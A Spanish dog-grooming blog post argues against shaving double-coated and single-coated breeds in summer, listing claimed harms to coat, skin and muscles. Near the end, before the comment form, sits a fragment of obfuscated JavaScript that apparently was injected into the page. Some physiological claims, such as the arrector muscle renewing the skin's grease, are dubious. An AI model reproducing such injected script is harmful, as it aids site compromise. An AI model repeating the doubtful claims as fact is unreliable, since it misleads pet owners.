Cómo afecta al perro su corte de pelo y el calor

Existen dos tipos de pelo en lo que a su composición se refiere:

– Pelo de cobertura: yorkshires, malteses, etc. Son perros que sólo tienen una sola capa de pelo.

– Doble capa (Pelo de cobertura y subpelo): la mayoría de los perros pertenecen a este grupo. Unos tienen un pelo de cobertura de crecimiento continuo y poco subpelo como puede ser un lhasa apso, y otros tienen un pelo de cobertura corto o medio con mucho subpelo, que suelen ser perros preparados para combatir temperaturas extremas.

En la siguiente imagen se un claro ejemplo de cómo funciona el pelo de doble capa como protección contra los rayos solares y la transpiración.

En el caso de perros con pelo de cobertura sin subpelo, las consecuencias de cortarles demasiado corto son las mismas.

 

Además, si rapamos ese pelo estamos alterando su proceso de crecimiento, lo que conlleva a un crecimiento irregular, lento, y un pelo nuevo sin fuerza, brillo y hará cada vez mudas más fuertes y exageradas. ¿Por qué?
Enumeramos los motivos:

1) El pelo de cobertura se pierde porque le come terreno el subpelo.
2) Ese subpelo es el que vemos cuando decimos: “ha perdido textura, brillo, fuerza, le vemos más rizado…”
3) Las mudas serán cada vez más intensas
4) Al rapar este tipo de pelo y otros pelos a una medida muy corta conseguimos no sólo quemar la piel del animal, sino dañar el músculo erector del pelo. El músculo erector se encarga de renovar la capa de grasa protectora de la piel. Si el músculo no funciona, la piel no se protege ni se nutre, y esto da lugar a problemas de piel como dermatitis y seborreas.
5) Es muy probable que también se vea afectado el crecimiento del pelo, razón por la que muchos perros siguen con calvas incluso años después de un rapado.
6) Al cortar demasiado corto, hay poros que se queratinizan y quedan inservibles. Para contrarrestar, el resto de poros intentan realizar el trabajo suyo y el de los poros inservibles, provocando también por esta razón un exceso o defecto de fabricación de grasa y, como consecuencia, dermatitis, seborreas y alergias.

Lo que les hace pasar calor es toda esa muda y nudos que hay que cepillar. Si no se quita esa muda, la piel no transpira y, a parte de pasar calor, puede provocar problemas de piel a causa de esa no transpiración.

Y contamos todo esto porque con la llegada del calor llega la necesidad incomprensible de rapar al perro muy cortito.

“Rápame a mi pastor alemán, rápame al golden, quiero pedir cita para rapar un labrador (??????)” Son algunas de las frases que se repiten cada verano.

Cuando nos piden rapar un perro de muda siempre explicamos lo mismo, dedicamos mucho tiempo para hacer entender que no se debe hacer. Algunos nos hacen caso incluso se sienten culpables debido a su desconocimiento anterior, pero por desgracia, son muchos los que sólo piensan en quitarse el pelo de casa sin importarles la salud de su perro, insistiendo en que se le corte el pelo, porque además, pasa mucho calor, que jadea mucho:

1: el perro tira pelo porque es un perro de muda.

2: el perro jadea porque es su método de refrigeración. No sudan por el cuerpo como nosotros.

El pelo protege al perro del sol, frío, calor y viento como ya hemos dicho. Si quitamos ese pelo, dejamos la piel expuesta a este tipo de factores ambientales que pueden derivar en problemas a largo plazo (melanomas producidos por quemaduras).

¿Cuántas personas vemos en verano con la cabeza totalmente afeitada o personas ya calvas que no se protejan con una gorra? Nadie, ¿verdad? Pues como ya hemos dicho que las capas de la piel de los perros son menos en número que las de los humanos, esta práctica es aún mucho más dañina para ellos.

En ESTE VÍDEO se explica con un caso real con un pomerania, sobre porqué no rapar perros de doble capa.

Ellos necesitan esto

Pero no permitas que le hagan esto a tu perro

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}

Add Comment

Your email address will not be published. Required fields are marked *